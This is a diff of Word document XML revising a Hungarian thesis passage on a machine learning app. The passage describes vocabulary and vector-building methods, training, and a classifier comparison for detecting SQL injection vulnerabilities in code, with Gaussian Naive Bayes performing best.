+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ténylegesen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>max_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A paraméterek változókba helyezésén kívül még inicializál</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>va van egy számláló (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>), két szótár (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word2index, indextoword</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>táblázat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) és a kimeneti vektoroknak egy-egy változó (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>X, y</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">collectVocab: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">etódus, ami </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> teszi a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dataset </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0.oszlopá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nak szavait </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>előfordulási szám</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>uk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>at, utóbbi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> szerint csökkenő sorrendben.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">createLookupTables: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>etódus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, ami </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word2index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">változóba teszi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> szavait</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sorrendnek megfelelően </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2-től </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>indexelve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-egy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>indexet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> társít hozzájuk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nulladik és első index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a *** és ismeretlen szavakhoz van fenntartva</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">word2index </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>value-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">index, az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>index2word-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>be pedig index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>formában kerülnek be a szavak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az indexükkel.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">createVectors: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Metódus, ami ciklussal végigmegy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egyrészt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dataset </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0.oszlopának</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> szavain, és a hozzájuk tartozó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word2indenx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-beli</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> indexet </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">X </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gyűjti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>. Ennek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hosszát később módosítja a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">max_length </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóban megadottra, így a vektorok hossza egységes marad.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Másrészt a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dataset </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.oszlopának bináris számain is, amiket pedig az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">y </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóba tesz.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="1134"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF0CC3C" wp14:editId="4CD7F8BB">
+            <wp:extent cx="3784795" cy="1892397"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="23" name="Kép 23"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="3784795" cy="1892397"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -17281,7 +17167,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>4</w:t>
+        <w:t>5</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17421,69 +17307,37 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>concatenated</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>_titled</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.csv</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 40.sorának felel meg, ami ekvivalens a 3.3-as ábrával</w:t>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.csv 40.sorának</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> felel meg, ami ekvivalens a 3.3-as ábrával</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17552,7 +17406,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> változókat lementi egy-egy .npy fájlba.</w:t>
+        <w:t xml:space="preserve"> változókat lementi egy-egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>num</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>py fájlba.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17597,23 +17463,21 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\trainer.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-on be</w:t>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>trainer.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-on</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> be</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17695,13 +17559,17 @@
         </w:rPr>
         <w:t>kód SQL injectionbeli sebezhetőségével kapcsolatban.</w:t>
       </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:iCs/>
@@ -17752,19 +17620,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">egyrészt beolvassa a „toimport” numpy fájlokat, amiket a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">classifier2 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">metódusnak ad át, másrészt </w:t>
+        <w:t xml:space="preserve">egyrészt beolvassa a „toimport” numpy fájlokat, amiket a classifier2 metódusnak ad át, másrészt </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17924,28 +17780,88 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Az általa visszaadott metrikák segítségével hasonlítottam össze az algoritmusokat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>aminek az eredményét a 3.5-ös ábra táblázata mutatja.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Látható, hogy a Gaussian Naive Bayes éri el a legnagyobb értéket 73,9%-os pontossággal. Bár minden futás során újragerenálódnak ezek az értékek, de a végeredmény ugyan az: a GaussianNB 73% és 77% közötti Recall értékkel az első helyen marad, így a tanulást már ez az algoritmus végzi</w:t>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Az általa visszaadott metrikák segítségével </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>main</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>össze</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hasonlítja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az algoritmusokat, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>aminek az eredményét a 3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>s ábra táblázata mutatja.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Látható, hogy a Gaussian Naive Bayes éri el a legnagyobb értéket 73,9%-os pontossággal. Bár minden futás során újragerenálódnak ezek az értékek, de a végeredmény ugyan az: a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>GaussianNB 73% és 77% közötti Recall értékkel az első helyen marad, így a tanulást már ez az algoritmus végzi</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17990,7 +17906,55 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Metódus, amely metrikákat biztosít a paraméterként megadott teszt adatok és osztályozás által. </w:t>
+        <w:t xml:space="preserve">Metódus, amely </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">visszaadja a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">paraméterként megadott </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>algoritmus hatékonyságának számát</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egy [0;1] intervallumon</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">szintén </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">paraméterként megadott teszt adatok által. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18014,44 +17978,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
